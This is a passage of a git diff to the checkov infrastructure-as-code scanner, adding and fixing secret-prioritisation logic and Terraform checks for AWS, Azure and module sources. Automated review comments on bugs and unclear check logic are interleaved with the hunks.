secret_records[secret_key].check_id in ENTROPY_CHECK_IDS and check_id not in ENTROPY_CHECK_IDS: - secret_records.pop(secret_key) - else: + is_prioritise = self._prioritise_secrets(secret_records, secret_key, check_id) + if not is_prioritise: continue bc_check_id = metadata_integration.get_bc_id(check_id) if bc_check_id in secret_suppressions_id: 
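Review bot: The UUID filter on the new side tests `secret.check_id not in secrets_in_uuid_form`, but the loop already computed `check_id` with the `SECRET_TYPE_TO_ID` fallback a few lines earlier; when `secret.check_id` is `None` the two differ, so use `check_id not in secrets_in_uuid_form` for consistency with the rest of the loop. The stripping step keys the record on `PotentialSecret.hash_secret(stripped)` while `secret.secret_hash` itself is left unchanged, which looks intended for collapsing `"value"` and `value` but is not obvious; a comment such as `# dedupe quoted and unquoted forms of the same value under one key` would help. `run` continues outside this hunk.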
@@ -310,6 +332,17 @@ def run( self._modify_invalid_secrets_check_result_to_skipped(report) return report + @staticmethod + def _prioritise_secrets(secret_records: Dict[str, SecretsRecord], secret_key: str, check_id: str) -> bool: + if secret_records[secret_key].check_id in ENTROPY_CHECK_IDS and check_id not in ENTROPY_CHECK_IDS: + secret_records.pop(secret_key) + return True + if secret_records[secret_key].check_id in GENERIC_PRIVATE_KEY_CHECK_IDS: + if check_id not in GENERIC_PRIVATE_KEY_CHECK_IDS | ENTROPY_CHECK_IDS: + secret_records.pop(secret_key) + return True + return False + def cleanup_plugin_files( self, work_path: str, @@ -423,7 +456,8 @@ def verify_secrets(self, report: Report, enriched_secrets_s3_path: str) -> Verif validate_secrets_tenant_config = None if bc_integration.customer_run_config_response is not None: - validate_secrets_tenant_config = bc_integration.customer_run_config_response.get('tenantConfig', {}).get('secretsValidate') + validate_secrets_tenant_config = bc_integration.customer_run_config_response.get( + 'tenantConfig', {}).get('secretsValidate') if validate_secrets_tenant_config is None and not convert_str_to_bool(os.getenv("CKV_VALIDATE_SECRETS", False)): logging.debug('Secrets verification is off, enable it via code configuration screen') diff --git a/checkov/secrets/scan_git_history.py b/checkov/secrets/scan_git_history.py index 49ab4fb7f0e..b9256decbc0 100644 --- a/checkov/secrets/scan_git_history.py +++ b/checkov/secrets/scan_git_history.py @@ -20,7 +20,7 @@ os.environ["GIT_PYTHON_REFRESH"] = "quiet" try: - from git import Repo, Tree # type: ignore + from git import Repo, Tree git_import_error = None except ImportError as e: diff --git a/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py b/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py index b30119ef1d7..88a5c16805c 100644 --- a/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py 
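Review bot: `_prioritise_secrets` has no docstring, and its name and the caller's `is_prioritise` read as a question while the function actually reports a side effect: `True` means the existing record was popped and the new one should be inserted, `False` means the existing record wins. A docstring such as `"""Decide whether check_id should replace the existing record for secret_key. Generic entropy and generic private-key findings yield to more specific detectors; returns True after popping the old record, False to keep it."""` plus a call-site name like `replaced` would make `if not is_prioritise: continue` self-explanatory. Two entropy checks (for example CKV_SECRET_6 and CKV_SECRET_19) hitting the same key keep whichever was seen first, which is presumably intended but worth stating in the docstring.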
+++ b/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py @@ -32,8 +32,8 @@ def scan_data_conf(self, conf: Dict[str, List[Any]]) -> CheckResult: list): for identifier in principal_identifiers: if isinstance(identifier, - list) and 'oidc-provider/token.actions.githubusercontent.com' in \ - identifier[0]: + list) and identifier[0] is not None and \ + 'oidc-provider/token.actions.githubusercontent.com' in identifier[0]: found_federated_gh_oidc = True break if not found_federated_gh_oidc: diff --git a/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml b/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml new file mode 100644 index 00000000000..7060abf6142 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/aws/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml @@ -0,0 +1,25 @@ +metadata: + id: "CKV2_AWS_68" + name: "Ensure SageMaker notebook instance IAM policy is not overly permissive" + category: "NETWORKING" + +definition: + and: + - cond_type: filter + value: + - aws_sagemaker_notebook_instance + operator: within + attribute: resource_type + - cond_type: connection + resource_types: + - aws_sagemaker_notebook_instance + connected_resource_types: + - aws_iam_role + operator: exists + - cond_type: attribute + resource_types: + - aws_iam_role + attribute: "policy.Statement[?(@.Effect == Allow)].Action[*]" + operator: "jsonpath_not_equals" + value: "*" + diff --git a/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml b/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml index 325bfcb5974..edd6f0a6c6c 100644 --- a/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml +++ b/checkov/terraform/checks/graph_checks/aws/VPCPeeringRouteTableOverlyPermissive.yaml 
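Review bot: The added `identifier[0] is not None` guard still indexes before checking emptiness, so an empty identifier list raises `IndexError`, and a non-string first element (a dict, for instance) is tested with `in` against its keys without an error but also without meaning. `if isinstance(identifier, list) and identifier and isinstance(identifier[0], str) and 'oidc-provider/token.actions.githubusercontent.com' in identifier[0]:` covers both cases in the same spirit as the fix. `scan_data_conf` starts and ends outside this hunk.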
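Review bot: The attribute condition targets `aws_iam_role` with `policy.Statement[?(@.Effect == Allow)].Action[*]`, but as far as I know `aws_iam_role` carries its trust policy in `assume_role_policy` and inline permissions under `inline_policy.*.policy`, with most permissions living in separate `aws_iam_role_policy` / `aws_iam_policy` resources attached to the role. If the `policy` attribute is absent on every role, the outcome depends entirely on how `jsonpath_not_equals` treats a missing path, so please confirm against a fixture whose role does grant `"Action": "*"`. The `name` promises "not overly permissive" while only `Action` is inspected, and `category: NETWORKING` seems off for an IAM check; `IAM` and a name such as "Ensure SageMaker notebook instance IAM role does not allow all actions" would describe what is enforced.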
@@ -22,18 +22,6 @@ definition: attribute: "route.*.cidr_block" operator: "not_contains" value: "0.0.0.0/0" - - cond_type: "attribute" - resource_types: - - "aws_route_table" - attribute: "route.*.cidr_block" - operator: "not_contains" - value: "0.0.0.0" - - cond_type: "attribute" - resource_types: - - "aws_route_table" - attribute: "route.*.ipv6_cidr_block" - operator: "not_contains" - value: "::0" - cond_type: "attribute" resource_types: - "aws_route_table" @@ -58,18 +46,6 @@ definition: attribute: "destination_cidr_block" operator: "not_contains" value: "0.0.0.0/0" - - cond_type: "attribute" - resource_types: - - "aws_route" - attribute: "destination_cidr_block" - operator: "not_contains" - value: "0.0.0.0" - - cond_type: "attribute" - resource_types: - - "aws_route" - attribute: "destination_ipv6_cidr_block" - operator: "not_contains" - value: "::0" - cond_type: "attribute" resource_types: - "aws_route" diff --git a/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml new file mode 100644 index 00000000000..316387f331e --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml 
@@ -0,0 +1,36 @@ +metadata: + id: "CKV2_AZURE_50" + name: "Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible" + category: "NETWORKING" + +definition: + or: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_machine_learning_workspace + - cond_type: attribute + resource_types: azurerm_machine_learning_workspace + attribute: high_business_impact + operator: equals + value: false + - and: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_machine_learning_workspace + - cond_type: connection + resource_types: + - azurerm_machine_learning_workspace + connected_resource_types: + - azurerm_storage_account + operator: exists + - cond_type: attribute + resource_types: azurerm_storage_account + attribute: public_network_access_enabled + operator: equals + value: false + + diff --git a/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml new file mode 100644 index 00000000000..4257b465792 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml @@ -0,0 +1,16 @@ +metadata: + id: "CKV2_AZURE_49" + name: "Ensure that Azure Machine learning workspace is not configured with overly permissive network access" + category: "NETWORKING" +definition: + or: + - cond_type: "attribute" + resource_types: "azurerm_machine_learning_workspace" + attribute: "public_network_access_enabled" + operator: "not_exists" + - cond_type: "attribute" + resource_types: "azurerm_machine_learning_workspace" + attribute: "public_network_access_enabled" + operator: "equals" + value: "false" + 
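Review bot: The top-level `or` in CKV2_AZURE_50 lists a bare `filter` on `azurerm_machine_learning_workspace` as its first branch beside the two real conditions; if a filter inside `or` is evaluated as an ordinary predicate rather than narrowing the resource set as it does inside `and`, every workspace passes regardless of `high_business_impact` or its storage account. CKV2_AZURE_48 in this same diff nests the filter inside each `and` branch; following that shape here removes the doubt. Also `high_business_impact` `equals false` does not hold when the attribute is simply omitted, which is its default, so a non-HBI workspace without the key would be pushed into the storage-account branch; `operator: not_equals` with `value: true` matches the intent.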
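Review bot: CKV2_AZURE_49 passes when `public_network_access_enabled` is absent (`not_exists`), but the azurerm provider documents this attribute on `azurerm_machine_learning_workspace` as defaulting to `true` (please confirm for the provider versions you target), so an unset workspace is publicly reachable yet reported as compliant. Dropping the `not_exists` branch and keeping only `equals false` makes the check fail closed on the default, and a one-line comment recording the provider default would explain why.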
diff --git a/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml b/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml new file mode 100644 index 00000000000..48c03706f76 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml @@ -0,0 +1,45 @@ +metadata: + id: "CKV2_AZURE_48" + name: "Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption" + category: "ENCRYPTION" +definition: + or: + - and: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_databricks_workspace + - resource_types: + - azurerm_databricks_workspace + operator: not_equals + cond_type: attribute + attribute: sku + value: "premium" + - and: + - cond_type: filter + attribute: resource_type + operator: within + value: + - azurerm_databricks_workspace + - resource_types: + - azurerm_databricks_workspace + operator: equals + cond_type: attribute + attribute: sku + value: "premium" + - resource_types: + - azurerm_databricks_workspace + operator: equals + cond_type: attribute + attribute: customer_managed_key_enabled + value: true + - resource_types: + - azurerm_databricks_workspace + connected_resource_types: + - azurerm_databricks_workspace_root_dbfs_customer_managed_key + operator: exists + cond_type: connection + +# Root DBFS encryption is only valid if the Databricks Workspace sku is set to 'premium'. +# https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/databricks_workspace#customer_managed_key_enabled \ No newline at end of file diff --git a/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml b/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml new file mode 100644 index 00000000000..744c96cdd83 --- /dev/null 
+++ b/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml @@ -0,0 +1,39 @@ +metadata: + id: "CKV2_AZURE_54" + name: "Ensure log monitoring is enabled for Synapse SQL Pool" + category: "LOGGING" + +definition: + and: + - cond_type: connection + resource_types: + - azurerm_synapse_sql_pool + connected_resource_types: + - azurerm_synapse_sql_pool_extended_auditing_policy + operator: exists + - cond_type: filter + attribute: resource_type + value: + - azurerm_synapse_sql_pool + operator: within + + - or: + - and: + - cond_type: attribute + resource_types: + - azurerm_synapse_sql_pool_extended_auditing_policy + attribute: log_monitoring_enabled + operator: exists + + - cond_type: attribute + resource_types: + - azurerm_synapse_sql_pool_extended_auditing_policy + attribute: log_monitoring_enabled + operator: equals + value: true + + - cond_type: attribute + resource_types: + - azurerm_synapse_sql_pool_extended_auditing_policy + attribute: log_monitoring_enabled + operator: not_exists \ No newline at end of file diff --git a/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml b/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml new file mode 100644 index 00000000000..19e2a749db7 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml 
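Review bot: In CKV2_AZURE_54 the inner `and` pairs `log_monitoring_enabled` `exists` with `log_monitoring_enabled` `equals true`; the second implies the first, so the `and` can collapse to the single `equals true` condition. The `not_exists` branch passes on absence, which is only right if the provider default for `log_monitoring_enabled` on `azurerm_synapse_sql_pool_extended_auditing_policy` is `true` (it is, as far as I recall), and a YAML comment stating that assumption would save the next reader a lookup. The file also lacks a trailing newline.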
@@ -0,0 +1,24 @@ +metadata: + id: "CKV2_AZURE_51" + name: "Ensure Synapse SQL Pool has a security alert policy" + category: "GENERAL_SECURITY" + +definition: + and: + - cond_type: connection + resource_types: + - azurerm_synapse_sql_pool + connected_resource_types: + - azurerm_synapse_sql_pool_security_alert_policy + operator: exists + - cond_type: attribute + resource_types: + - azurerm_synapse_sql_pool_security_alert_policy + attribute: 'policy_state' + operator: equals + value: 'Enabled' + - cond_type: filter + attribute: resource_type + value: + - azurerm_synapse_sql_pool + operator: within \ No newline at end of file diff --git a/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml b/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml new file mode 100644 index 00000000000..5d1c2c849b7 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml @@ -0,0 +1,32 @@ +metadata: + id: "CKV2_AZURE_52" + name: "Ensure Synapse SQL Pool has vulnerability assessment attached" + category: "GENERAL_SECURITY" + +definition: + and: + - resource_types: + - azurerm_synapse_sql_pool + connected_resource_types: + - azurerm_synapse_sql_pool_security_alert_policy + operator: exists + cond_type: connection + - resource_types: + - azurerm_synapse_sql_pool_security_alert_policy + connected_resource_types: + - azurerm_synapse_sql_pool_vulnerability_assessment + operator: exists + cond_type: connection + - cond_type: attribute + resource_types: + - azurerm_synapse_sql_pool_vulnerability_assessment + attribute: 'recurring_scans.*.enabled' + operator: equals + value: true + - cond_type: filter + attribute: resource_type + value: + - azurerm_synapse_sql_pool_security_alert_policy + operator: within + + \ No newline at end of file 
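Review bot: CKV2_AZURE_52's `filter` selects `azurerm_synapse_sql_pool_security_alert_policy` rather than the SQL pool, so a pool that has no security alert policy at all is never evaluated by this check and produces no finding, whereas the sibling CKV2_AZURE_51 filters on `azurerm_synapse_sql_pool`. If the intent is "every SQL pool has a vulnerability assessment", the filter should select the pool and the `connection` chain should start from it; if the intent is the narrower "every alert policy has an assessment", the `name` should say so. A comment recording which reading was chosen would stop the two checks from being read as overlapping.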
diff --git a/checkov/terraform/checks/graph_checks/azure/SynapseWorkspaceHasExtendedAuditLogs.yaml b/checkov/terraform/checks/graph_checks/azure/SynapseWorkspaceHasExtendedAuditLogs.yaml new file mode 100644 index 00000000000..038284a5951 --- /dev/null +++ b/checkov/terraform/checks/graph_checks/azure/SynapseWorkspaceHasExtendedAuditLogs.yaml @@ -0,0 +1,18 @@ +metadata: + id: "CKV2_AZURE_53" + name: "Ensure Azure Synapse Workspace has extended audit logs" + category: "LOGGING" + +definition: + and: + - cond_type: filter + attribute: resource_type + value: + - azurerm_synapse_workspace + operator: within + - cond_type: connection + resource_types: + - azurerm_synapse_workspace + connected_resource_types: + - azurerm_synapse_workspace_extended_auditing_policy + operator: exists \ No newline at end of file diff --git a/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml b/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml deleted file mode 100644 index 1bce7d5095b..00000000000 --- a/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml +++ /dev/null @@ -1,23 +0,0 @@ -metadata: - id: "CKV2_IBM_6" - name: "Ensure Databases network access is restricted to a specific IP range" - category: "NETWORKING" - -definition: - and: - - cond_type: "attribute" - resource_types: "ibm_database" - attribute: "allowlist" - operator: "exists" - - - cond_type: "attribute" - resource_types: "ibm_database" - attribute: "allowlist.address" - operator: "not_equals_ignore_case" - value: "0.0.0.0/0" - - - cond_type: "attribute" - resource_types: "ibm_database" - attribute: "allowlist.address" - operator: "length_greater_than" - value: "0" diff --git a/checkov/terraform/checks/module/base_module_check.py b/checkov/terraform/checks/module/base_module_check.py index 62f0d0eceb4..df2189d8e5e 100644 --- a/checkov/terraform/checks/module/base_module_check.py 
+++ b/checkov/terraform/checks/module/base_module_check.py @@ -45,3 +45,7 @@ def scan_entity_conf(self, conf: Dict[str, List[Any]], entity_type: str) -> Chec @abstractmethod def scan_module_conf(self, conf: Dict[str, List[Any]]) -> CheckResult: raise NotImplementedError() + + @staticmethod + def is_git_source(source: str) -> bool: + return source.startswith('git@') or source.startswith('git::') or source.startswith('github.com') or source.startswith('bitbucket.org') diff --git a/checkov/terraform/checks/module/generic/RevisionVersionTag.py b/checkov/terraform/checks/module/generic/RevisionVersionTag.py new file mode 100644 index 00000000000..34a7b85072d --- /dev/null +++ b/checkov/terraform/checks/module/generic/RevisionVersionTag.py 
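Review bot: `is_git_source` chains four `startswith` calls; `str.startswith` accepts a tuple, so `return source.startswith(('git@', 'git::', 'github.com', 'bitbucket.org'))` says the same in one call. A docstring should state that the prefixes intentionally mirror Terraform's own git source detection (the `git::` forced getter, the `git@host:path` SSH form, and the `github.com/` and `bitbucket.org/` shorthands), so that nobody later "fixes" it by adding plain `https://` URLs, which Terraform does not treat as git without `git::`.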
@@ -0,0 +1,41 @@ +from __future__ import annotations + +import re +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.terraform.checks.module.base_module_check import BaseModuleCheck +from .RevisionHash import check as RevisionHashCheck + +VERSION_PATTERN = re.compile(r"[?&](ref=).*(\d\.\d).*") + + +class RevisionVersionTag(BaseModuleCheck): + def __init__(self) -> None: + name = "Ensure Terraform module sources use a tag with a version number" + id = "CKV_TF_2" + categories = [CheckCategories.SUPPLY_CHAIN] + super().__init__(name=name, id=id, categories=categories) + + def scan_module_conf(self, conf: dict[str, list[Any]]) -> CheckResult: + # this check is a more lenient version of the hash check, so if that one passes (or is unknown due to a local module), + # then we are done + hash_result = RevisionHashCheck.scan_module_conf(conf) + if hash_result != CheckResult.FAILED: + return hash_result + + source = conf.get("source") + if source and isinstance(source, list): + source_url = source[0] + if BaseModuleCheck.is_git_source(source_url): + if ("?ref" in source_url or "&ref" in source_url) and re.search(VERSION_PATTERN, source_url): + return CheckResult.PASSED + else: + version = conf.get("version") + if source and isinstance(version, list): + return CheckResult.PASSED + + return CheckResult.FAILED + + +check = RevisionVersionTag() diff --git a/checkov/terraform/checks/resource/__init__.py b/checkov/terraform/checks/resource/__init__.py index e28fd64ce5f..9228a58ee71 100644 --- a/checkov/terraform/checks/resource/__init__.py +++ b/checkov/terraform/checks/resource/__init__.py @@ -12,3 +12,4 @@ from checkov.terraform.checks.resource.kubernetes import * # noqa from checkov.terraform.checks.resource.yandexcloud import * # noqa from checkov.terraform.checks.resource.ncp import * # noqa +from checkov.terraform.checks.resource.tencentcloud import * # noqa 
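Review bot: `VERSION_PATTERN = re.compile(r"[?&](ref=).*(\d\.\d).*")` accepts any `ref` whose value contains a digit, a dot and a digit anywhere, so `?ref=feature/2.0-migration` passes as a "version tag" while `?ref=v2` fails; since a branch and a tag look identical in the URL, the check cannot establish immutability and its docstring should describe it as a "looks like a version" heuristic. The `("?ref" in source_url or "&ref" in source_url)` test is redundant with the pattern, `re.search(VERSION_PATTERN, source_url)` should be `VERSION_PATTERN.search(source_url)`, and anchoring the pattern to the start of the ref value, e.g. `VERSION_PATTERN = re.compile(r"[?&]ref=v?\d+(\.\d+)+")`, stops `.*` from accepting a version-looking substring elsewhere in the query. In the non-git branch, `isinstance(version, list)` passes any `version` argument, including a loose constraint such as `>= 1.0`; a comment stating that this check only asserts a version constraint exists, with `RevisionHash` being the stricter one, would set expectations.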
diff --git a/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py b/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py index e8f4737c626..fb09830902c 100644 --- a/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py +++ b/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py @@ -1,5 +1,9 @@ +from __future__ import annotations + +from typing import Any + from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck -from checkov.common.models.enums import CheckCategories +from checkov.common.models.enums import CheckCategories, CheckResult class APIGatewayMethodSettingCacheEncrypted(BaseResourceValueCheck): @@ -18,5 +22,20 @@ def __init__(self): def get_inspected_key(self): return "settings/[0]/cache_data_encrypted" + def scan_resource_conf(self, conf: dict[str, list[Any]]) -> CheckResult: + settings = conf.get("settings", {}) + if settings and len(settings) == 1: + settings = settings[0] + cache_enabled = settings.get("caching_enabled", [False]) + if isinstance(cache_enabled, list) and len(cache_enabled) == 1: + cache_enabled = cache_enabled[0] + if cache_enabled: + cache_encrypted = settings.get("cache_data_encrypted", [False]) + if isinstance(cache_encrypted, list) and len(cache_encrypted) == 1: + cache_encrypted = cache_encrypted[0] + if not cache_encrypted: + return CheckResult.FAILED + return CheckResult.PASSED + check = APIGatewayMethodSettingCacheEncrypted() diff --git a/checkov/terraform/checks/resource/aws/BedrockAgentEncrypted.py b/checkov/terraform/checks/resource/aws/BedrockAgentEncrypted.py new file mode 100644 index 00000000000..24473792804 --- /dev/null +++ b/checkov/terraform/checks/resource/aws/BedrockAgentEncrypted.py 
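Review bot: `scan_resource_conf` only unwraps `settings` when `len(settings) == 1`; the default `{}` survives the following `.get` calls, but if the parser ever hands back a list of two `settings` blocks, or one whose element is not a dict, `settings.get(...)` raises `AttributeError` on a list and the check errors out instead of returning a result. A guard keeps the intent explicit: `if not settings or not isinstance(settings[0], dict): return CheckResult.PASSED` (or `UNKNOWN`, if that is the convention here for unparseable blocks) before reading `caching_enabled`. The method also deserves a one-line docstring stating the rule it encodes, that encryption is only required when `caching_enabled` is true, so a method setting without a cache passes. `get_inspected_key` is kept above and now only matters if the base class consults it elsewhere.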
@@ -0,0 +1,23 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+
+
+class BedrockAgentEncrypted(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure Bedrock Agent is encrypted with a CMK"
+ id = "CKV_AWS_373"
+ supported_resources = ("aws_bedrockagent_agent",)
+ categories = (CheckCategories.ENCRYPTION,)
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self) -> str:
+ return "customer_encryption_key_arn"
+
+ def get_expected_value(self) -> Any:
+ return ANY_VALUE
+
+
+check = BedrockAgentEncrypted()
diff --git a/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py b/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py
new file mode 100644
index 00000000000..24fe3b80b9b
--- /dev/null
+++ b/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py
@@ -0,0 +1,25 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class CloudsearchDomainEnforceHttps(BaseResourceValueCheck):
+ def __init__(self):
+ name = "Ensure AWS Cognito identity pool does not allow unauthenticated guest access"
+ id = "CKV_AWS_366"
+ supported_resources = ["aws_cognito_identity_pool"]
+ categories = [CheckCategories.IAM]
+ super().__init__(
+ name=name,
+ id=id,
+ categories=categories,
+ supported_resources=supported_resources,
+ )
+
+ def get_inspected_key(self) -> str:
+ return "allow_unauthenticated_identities"
+
+ def get_expected_value(self) -> bool:
+ return False
+
+
+check = CloudsearchDomainEnforceHttps()
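Review bot: The class in CognitoUnauthenticatedIdentities.py is named `CloudsearchDomainEnforceHttps`, which appears to be copied from another check and, if the package star-imports every module, shadows that name; rename it in both places: `class CognitoUnauthenticatedIdentities(BaseResourceValueCheck):` and `check = CognitoUnauthenticatedIdentities()`. As far as I know `allow_unauthenticated_identities` defaults to false when omitted, so confirm what the value-check base class returns for a missing attribute — if that default is FAILED, pass `missing_block_result=CheckResult.PASSED` so a pool that simply omits the attribute is not flagged. A comment stating that default would spare the next reader the same question.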
diff --git a/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py b/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py index ad31c14c279..d3923989afc 100644 --- a/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py +++ b/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py @@ -1,11 +1,11 @@ - +from typing import List, Any from checkov.common.models.enums import CheckCategories from checkov.terraform.checks.resource.base_resource_negative_value_check import BaseResourceNegativeValueCheck class DeprecatedLambdaRuntime(BaseResourceNegativeValueCheck): - def __init__(self): + def __init__(self) -> None: name = "Ensure Lambda Runtime is not deprecated" id = "CKV_AWS_363" supported_resources = ['aws_lambda_function'] @@ -15,18 +15,15 @@ def __init__(self): def get_inspected_key(self) -> str: return "runtime" - def get_forbidden_values(self): + def get_forbidden_values(self) -> List[Any]: + # Source: https://docs.aws.amazon.com/lambda/latest/dg/lambda-runtimes.html return ["dotnetcore3.1", "nodejs12.x", "python3.6", "python2.7", "dotnet5.0", "dotnetcore2.1", "ruby2.5", "nodejs10.x", "nodejs8.10", "nodejs4.3", "nodejs6.10", "dotnetcore1.0", "dotnetcore2.0", - "nodejs4.3-edge", "nodejs", - # "python3.7", # Uncomment on Nov 27, 2023 - # "nodejs14.x", # Uncomment on Nov 27, 2023 - # "ruby2.7", # Uncomment on Dec 7, 2023 - # "provided", # Uncomment on Dec 31, 2023 - # "go1.x", # Uncomment on Dec 31, 2023 - # "java8", # Uncomment on Dec 31, 2023 - # "nodejs16.x", # Uncomment on Mar 11, 2024 + "nodejs4.3-edge", "nodejs", "java8", "python3.7", "go1.x", "provided", "ruby2.7", "nodejs14.x" + # "nodejs16.x", # Uncomment on Jun 12, 2024 + # "python3.8". # Uncomment on Oct 14, 2024 # "dotnet7", # Uncomment on May 14, 2024 + # "dotnet6", # Uncomment on Nov 12, 2024 ] 
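Review bot: The new last element `"nodejs14.x"` has no trailing comma, so the day one of the commented entries below is uncommented the two string literals will be implicitly concatenated into `"nodejs14.xnodejs16.x"` and silently never match; add the comma now. The `python3.8` line also has a `.` instead of `,` after the literal, which becomes a SyntaxError when enabled — write it as `# "python3.8",  # Uncomment on Oct 14, 2024`. Ordering the pending entries by date (`dotnet7` May 14 before `nodejs16.x` Jun 12) would make the next scheduled edit easier to spot.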
diff --git a/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py b/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py index 4f39ffc68a0..3ed728d7ecb 100644 --- a/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py +++ b/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py @@ -8,7 +8,7 @@ class ECSClusterLoggingEncryptedWithCMK(BaseResourceCheck): def __init__(self) -> None: - name = "Ensure ECS Cluster logging uses CMK" + name = "Ensure ECS Cluster logging is enabled and client to container communication uses CMK" id = "CKV_AWS_224" supported_resources = ("aws_ecs_cluster",) categories = (CheckCategories.ENCRYPTION,) diff --git a/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py b/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py index 99a6544fbc8..563798a01d0 100644 --- a/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py +++ b/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py @@ -24,7 +24,7 @@ def get_inspected_key(self) -> str: return "version" def get_expected_values(self) -> list[Any]: - return ["1.23", "1.24", "1.25", "1.26", "1.27", "1.28"] + return ["1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30"] check = EKSPlatformVersion() diff --git a/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py index 56fa9aaa522..d98dd54e218 100644 --- a/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py +++ b/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py 
